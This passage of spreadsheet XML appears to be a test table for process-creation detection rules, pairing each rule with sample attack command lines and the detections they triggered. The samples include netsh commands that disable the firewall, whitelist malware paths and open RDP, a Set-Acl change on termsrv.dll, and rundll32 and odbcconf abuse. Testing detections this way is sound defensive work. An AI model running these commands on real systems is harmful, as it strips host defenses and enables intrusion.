          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2920" s="43" t="inlineStr">
        <is>
          <t>a35f5a72-f347-4e36-8895-9869b0d5fc6d</t>
        </is>
      </c>
      <c r="E2920" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="MaliciousRule" dir=in action=allow program="C:\Windows\SystemVolumeInformation\malware.exe"</t>
        </is>
      </c>
      <c r="F2920" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2920" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2920" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2920" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2920" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2920" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2921" ht="15.75" customHeight="1" s="42">
      <c r="A2921" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2921" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_program_in_susp_location</t>
        </is>
      </c>
      <c r="C2921" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2921" s="43" t="inlineStr">
        <is>
          <t>a35f5a72-f347-4e36-8895-9869b0d5fc6d</t>
        </is>
      </c>
      <c r="E2921" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="Bypass" dir=in action=allow program="C:\Users\Public\Downloads\evil.exe"</t>
        </is>
      </c>
      <c r="F2921" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2921" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2921" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2921" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE (a35f5a72-f347-4e36-8895-9869b0d5fc6d); New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2921" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2921" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2922" ht="15.75" customHeight="1" s="42">
      <c r="A2922" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2922" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_program_in_susp_location</t>
        </is>
      </c>
      <c r="C2922" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2922" s="43" t="inlineStr">
        <is>
          <t>a35f5a72-f347-4e36-8895-9869b0d5fc6d</t>
        </is>
      </c>
      <c r="E2922" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="Hidden" dir=in action=allow program="C:\Users\Public\Local Settings\Temporary Internet Files\agent.exe"</t>
        </is>
      </c>
      <c r="F2922" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2922" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2922" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2922" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE (a35f5a72-f347-4e36-8895-9869b0d5fc6d); New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2922" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2922" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2923" ht="15.75" customHeight="1" s="42">
      <c r="A2923" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2923" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_rdp</t>
        </is>
      </c>
      <c r="C2923" s="43" t="inlineStr">
        <is>
          <t>RDP Connection Allowed Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2923" s="43" t="inlineStr">
        <is>
          <t>01aeb693-138d-49d2-9403-c4f52d7d3d62</t>
        </is>
      </c>
      <c r="E2923" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="RDP-In" dir=in action=allow protocol=TCP localport=3389</t>
        </is>
      </c>
      <c r="F2923" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2923" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2923" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2923" s="43" t="inlineStr">
        <is>
          <t>RDP Connection Allowed Via Netsh.EXE (01aeb693-138d-49d2-9403-c4f52d7d3d62); New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2923" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2923" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2924" ht="15.75" customHeight="1" s="42">
      <c r="A2924" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2924" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_rdp</t>
        </is>
      </c>
      <c r="C2924" s="43" t="inlineStr">
        <is>
          <t>RDP Connection Allowed Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2924" s="43" t="inlineStr">
        <is>
          <t>01aeb693-138d-49d2-9403-c4f52d7d3d62</t>
        </is>
      </c>
      <c r="E2924" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="RDP-In" dir=in action=allow protocol=TCP localport=0x0D3D</t>
        </is>
      </c>
      <c r="F2924" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2924" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2924" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2924" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2924" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2924" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2925" ht="15.75" customHeight="1" s="42">
      <c r="A2925" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2925" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_rdp</t>
        </is>
      </c>
      <c r="C2925" s="43" t="inlineStr">
        <is>
          <t>RDP Connection Allowed Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2925" s="43" t="inlineStr">
        <is>
          <t>01aeb693-138d-49d2-9403-c4f52d7d3d62</t>
        </is>
      </c>
      <c r="E2925" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="RDP-In" dir=in action=allow protocol=TCP localport=3380-3390</t>
        </is>
      </c>
      <c r="F2925" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2925" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2925" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2925" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2925" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2925" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2926" ht="15.75" customHeight="1" s="42">
      <c r="A2926" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2926" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_delete_rule</t>
        </is>
      </c>
      <c r="C2926" s="43" t="inlineStr">
        <is>
          <t>Firewall Rule Deleted Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2926" s="43" t="inlineStr">
        <is>
          <t>1a5fefe6-734f-452e-a07d-fc1c35bce4b2</t>
        </is>
      </c>
      <c r="E2926" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall delete rule name="Allow Port 80"</t>
        </is>
      </c>
      <c r="F2926" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2926" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2926" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2926" s="43" t="inlineStr">
        <is>
          <t>Firewall Rule Deleted Via Netsh.EXE (1a5fefe6-734f-452e-a07d-fc1c35bce4b2)</t>
        </is>
      </c>
      <c r="J2926" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2926" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2927" ht="15.75" customHeight="1" s="42">
      <c r="A2927" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2927" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_delete_rule</t>
        </is>
      </c>
      <c r="C2927" s="43" t="inlineStr">
        <is>
          <t>Firewall Rule Deleted Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2927" s="43" t="inlineStr">
        <is>
          <t>1a5fefe6-734f-452e-a07d-fc1c35bce4b2</t>
        </is>
      </c>
      <c r="E2927" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall delete rule name=\"Allow Port 80\"</t>
        </is>
      </c>
      <c r="F2927" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2927" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2927" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2927" s="43" t="inlineStr">
        <is>
          <t>Firewall Rule Deleted Via Netsh.EXE (1a5fefe6-734f-452e-a07d-fc1c35bce4b2)</t>
        </is>
      </c>
      <c r="J2927" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2927" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2928" ht="15.75" customHeight="1" s="42">
      <c r="A2928" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2928" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_delete_rule</t>
        </is>
      </c>
      <c r="C2928" s="43" t="inlineStr">
        <is>
          <t>Firewall Rule Deleted Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2928" s="43" t="inlineStr">
        <is>
          <t>1a5fefe6-734f-452e-a07d-fc1c35bce4b2</t>
        </is>
      </c>
      <c r="E2928" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall delete rule name="All"</t>
        </is>
      </c>
      <c r="F2928" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2928" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2928" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2928" s="43" t="inlineStr">
        <is>
          <t>Firewall Rule Deleted Via Netsh.EXE (1a5fefe6-734f-452e-a07d-fc1c35bce4b2)</t>
        </is>
      </c>
      <c r="J2928" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2928" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2929" ht="15.75" customHeight="1" s="42">
      <c r="A2929" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2929" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_disable</t>
        </is>
      </c>
      <c r="C2929" s="43" t="inlineStr">
        <is>
          <t>Firewall Disabled via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2929" s="43" t="inlineStr">
        <is>
          <t>57c4bf16-227f-4394-8ec7-1b745ee061c3</t>
        </is>
      </c>
      <c r="E2929" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall set allprofiles state off</t>
        </is>
      </c>
      <c r="F2929" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2929" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2929" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2929" s="43" t="inlineStr">
        <is>
          <t>Firewall Disabled via Netsh.EXE (57c4bf16-227f-4394-8ec7-1b745ee061c3)</t>
        </is>
      </c>
      <c r="J2929" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2929" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2930" ht="15.75" customHeight="1" s="42">
      <c r="A2930" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2930" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_disable</t>
        </is>
      </c>
      <c r="C2930" s="43" t="inlineStr">
        <is>
          <t>Firewall Disabled via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2930" s="43" t="inlineStr">
        <is>
          <t>57c4bf16-227f-4394-8ec7-1b745ee061c3</t>
        </is>
      </c>
      <c r="E2930" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall set allprofiles state o^f^f</t>
        </is>
      </c>
      <c r="F2930" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2930" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2930" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2930" s="43" t="inlineStr">
        <is>
          <t>Firewall Disabled via Netsh.EXE (57c4bf16-227f-4394-8ec7-1b745ee061c3)</t>
        </is>
      </c>
      <c r="J2930" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2930" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2931" ht="15.75" customHeight="1" s="42">
      <c r="A2931" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2931" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_disable</t>
        </is>
      </c>
      <c r="C2931" s="43" t="inlineStr">
        <is>
          <t>Firewall Disabled via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2931" s="43" t="inlineStr">
        <is>
          <t>57c4bf16-227f-4394-8ec7-1b745ee061c3</t>
        </is>
      </c>
      <c r="E2931" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall set allprofiles state $env:OFF</t>
        </is>
      </c>
      <c r="F2931" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2931" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2931" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2931" s="43" t="inlineStr">
        <is>
          <t>Firewall Disabled via Netsh.EXE (57c4bf16-227f-4394-8ec7-1b745ee061c3)</t>
        </is>
      </c>
      <c r="J2931" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2931" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2932" ht="15.75" customHeight="1" s="42">
      <c r="A2932" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2932" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_enable_group_rule</t>
        </is>
      </c>
      <c r="C2932" s="43" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall</t>
        </is>
      </c>
      <c r="D2932" s="43" t="inlineStr">
        <is>
          <t>347906f3-e207-4d18-ae5b-a9403d6bcdef</t>
        </is>
      </c>
      <c r="E2932" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes</t>
        </is>
      </c>
      <c r="F2932" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2932" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2932" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2932" s="43" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall (347906f3-e207-4d18-ae5b-a9403d6bcdef); Firewall Rule Update Via Netsh.EXE (a70dcb37-3bee-453a-99df-d0c683151be6)</t>
        </is>
      </c>
      <c r="J2932" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2932" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2933" ht="15.75" customHeight="1" s="42">
      <c r="A2933" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2933" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_enable_group_rule</t>
        </is>
      </c>
      <c r="C2933" s="43" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall</t>
        </is>
      </c>
      <c r="D2933" s="43" t="inlineStr">
        <is>
          <t>347906f3-e207-4d18-ae5b-a9403d6bcdef</t>
        </is>
      </c>
      <c r="E2933" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall set rule group='File and Printer Sharing' new enable=Yes</t>
        </is>
      </c>
      <c r="F2933" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2933" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2933" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2933" s="43" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall (347906f3-e207-4d18-ae5b-a9403d6bcdef); Firewall Rule Update Via Netsh.EXE (a70dcb37-3bee-453a-99df-d0c683151be6)</t>
        </is>
      </c>
      <c r="J2933" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2933" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2934" ht="15.75" customHeight="1" s="42">
      <c r="A2934" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2934" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_enable_group_rule</t>
        </is>
      </c>
      <c r="C2934" s="43" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall</t>
        </is>
      </c>
      <c r="D2934" s="43" t="inlineStr">
        <is>
          <t>347906f3-e207-4d18-ae5b-a9403d6bcdef</t>
        </is>
      </c>
      <c r="E2934" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall set rule new enable=Yes group="File and Printer Sharing"</t>
        </is>
      </c>
      <c r="F2934" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2934" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2934" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2934" s="43" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall (347906f3-e207-4d18-ae5b-a9403d6bcdef); Firewall Rule Update Via Netsh.EXE (a70dcb37-3bee-453a-99df-d0c683151be6)</t>
        </is>
      </c>
      <c r="J2934" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2934" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2935" ht="15.75" customHeight="1" s="42">
      <c r="A2935" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2935" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_enable_group_rule</t>
        </is>
      </c>
      <c r="C2935" s="43" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall</t>
        </is>
      </c>
      <c r="D2935" s="43" t="inlineStr">
        <is>
          <t>347906f3-e207-4d18-ae5b-a9403d6bcdef</t>
        </is>
      </c>
      <c r="E2935" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall set rule group="%windir%\system32\drivers\etc\File and Printer Sharing" new enable=Yes</t>
        </is>
      </c>
      <c r="F2935" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2935" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2935" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2935" s="43" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall (347906f3-e207-4d18-ae5b-a9403d6bcdef); Firewall Rule Update Via Netsh.EXE (a70dcb37-3bee-453a-99df-d0c683151be6)</t>
        </is>
      </c>
      <c r="J2935" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2935" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2936" ht="15.75" customHeight="1" s="42">
      <c r="A2936" s="43" t="inlineStr">
        <is>
          <t>defense-evasion</t>
        </is>
      </c>
      <c r="B2936" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_acl</t>
        </is>
      </c>
      <c r="C2936" s="43" t="inlineStr">
        <is>
          <t>PowerShell Script Change Permission Via Set-Acl</t>
        </is>
      </c>
      <c r="D2936" s="43" t="inlineStr">
        <is>
          <t>bdeb2cff-af74-4094-8426-724dc937f20a</t>
        </is>
      </c>
      <c r="E2936" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $termsrvDll = 'C:\Windows\System32\termsrv.dll'; $ACL = Get-Acl $termsrvDll; $permission = 'Administrators','FullControl','Allow'; $accessRule = New-Object System.Security.AccessControl.FileSystemAccessRule $permission; $ACL.SetAccessRule($accessRule); Set-Acl -Path $termsrvDll -AclObject $ACL }"</t>
        </is>
      </c>
      <c r="F2936" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2936" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2936" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2936" s="43" t="inlineStr">
        <is>
          <t>PowerShell Script Change Permission Via Set-Acl (bdeb2cff-af74-4094-8426-724dc937f20a)</t>
        </is>
      </c>
      <c r="J2936" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2936" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2937" ht="15.75" customHeight="1" s="42">
      <c r="A2937" s="43" t="inlineStr">
        <is>
          <t>defense-evasion</t>
        </is>
      </c>
      <c r="B2937" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_acl</t>
        </is>
      </c>
      <c r="C2937" s="43" t="inlineStr">
        <is>
          <t>PowerShell Script Change Permission Via Set-Acl</t>
        </is>
      </c>
      <c r="D2937" s="43" t="inlineStr">
        <is>
          <t>bdeb2cff-af74-4094-8426-724dc937f20a</t>
        </is>
      </c>
      <c r="E2937" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $termsrvDll = 'C:/Windows/System32/termsrv.dll'; $ACL = Get-Acl $termsrvDll; $permission = 'Administrators','FullControl','Allow'; $accessRule = New-Object System.Security.AccessControl.FileSystemAccessRule $permission; $ACL.SetAccessRule($accessRule); Set-Acl -Path $termsrvDll -AclObject $ACL }"</t>
        </is>
      </c>
      <c r="F2937" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2937" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2937" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2937" s="43" t="inlineStr">
        <is>
          <t>PowerShell Script Change Permission Via Set-Acl (bdeb2cff-af74-4094-8426-724dc937f20a)</t>
        </is>
      </c>
      <c r="J2937" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2937" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2938" ht="15.75" customHeight="1" s="42">
      <c r="A2938" s="43" t="inlineStr">
        <is>
          <t>defense-evasion</t>
        </is>
      </c>
      <c r="B2938" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_mshtml_runhtmlapplication</t>
        </is>
      </c>
      <c r="C2938" s="43" t="inlineStr">
        <is>
          <t>Mshtml.DLL RunHTMLApplication Suspicious Usage</t>
        </is>
      </c>
      <c r="D2938" s="43" t="inlineStr">
        <is>
          <t>4782eb5a-a513-4523-a0ac-f3082b26ac5c</t>
        </is>
      </c>
      <c r="E2938" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe vbscript:"\..\mshtml,#135" +String(CreateObject("WScript.Shell").Run("calc.exe"),0)</t>
        </is>
      </c>
      <c r="F2938" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2938" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2938" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2938" s="43" t="inlineStr">
        <is>
          <t>Mshtml.DLL RunHTMLApplication Suspicious Usage (4782eb5a-a513-4523-a0ac-f3082b26ac5c); Mshtml.DLL RunHTMLApplication Suspicious Usage (4782eb5a-a513-4523-a0ac-f3082b26ac5c); Wscript Shell Run In CommandLine (2c28c248-7f50-417a-9186-a85b223010ee); Wscript Shell Run In CommandLine (2c28c248-7f50-417a-9186-a85b223010ee); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J2938" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2938" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2939" ht="15.75" customHeight="1" s="42">
      <c r="A2939" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B2939" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr</t>
        </is>
      </c>
      <c r="C2939" s="43" t="inlineStr">
        <is>
          <t>New DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D2939" s="43" t="inlineStr">
        <is>
          <t>9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70</t>
        </is>
      </c>
      <c r="E2939" s="43" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {REGSVR "C:\AtomicRedTeam\atomics\T1218.008\src\Win32\T1218-2.dll"}</t>
        </is>
      </c>
      <c r="F2939" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2939" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2939" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2939" s="43" t="inlineStr">
        <is>
          <t>New DLL Registered Via Odbcconf.EXE (9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70)</t>
        </is>
      </c>
      <c r="J2939" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2939" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2940" ht="15.75" customHeight="1" s="42">
      <c r="A2940" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B2940" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr</t>
        </is>
      </c>
      <c r="C2940" s="43" t="inlineStr">
        <is>
          <t>New DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D2940" s="43" t="inlineStr">
        <is>
          <t>9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70</t>
        </is>
      </c>
      <c r="E2940" s="43" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {REGSVR C:\Temp\malicious.txt}</t>
        </is>
      </c>
      <c r="F2940" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2940" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2940" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2940" s="43" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474); Potentially Suspicious DLL Registered Via Odbcconf.EXE (ba4cfc11-d0fa-4d94-bf20-7c332c412e76)</t>
        </is>
      </c>
      <c r="J2940" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2940" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2941" ht="15.75" customHeight="1" s="42">
      <c r="A2941" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B2941" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr</t>
        </is>
      </c>
      <c r="C2941" s="43" t="inlineStr">
        <is>
          <t>New DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D2941" s="43" t="inlineStr">
        <is>
          <t>9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70</t>
        </is>
      </c>
      <c r="E2941" s="43" t="inlineStr">
        <is>
          <t>odbcconf.exe -A {REGSVR C:\Temp\malicious.txt}</t>
        </is>
      </c>
      <c r="F2941" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2941" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2941" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2941" s="43" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474); Potentially Suspicious DLL Registered Via Odbcconf.EXE (ba4cfc11-d0fa-4d94-bf20-7c332c412e76)</t>
        </is>
      </c>
      <c r="J2941" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2941" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2942" ht="15.75" customHeight="1" s="42">
      <c r="A2942" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B2942" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr_susp</t>
        </is>
      </c>
      <c r="C2942" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D2942" s="43" t="inlineStr">
        <is>
          <t>ba4cfc11-d0fa-4d94-bf20-7c332c412e76</t>
        </is>
      </c>
      <c r="E2942" s="43" t="inlineStr">
        <is>
          <t>odbcconf.exe /a {REGSVR "payload.bin"}</t>
        </is>
      </c>
      <c r="F2942" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2942" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2942" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2942" s="43" t="inlineStr">
        <is>
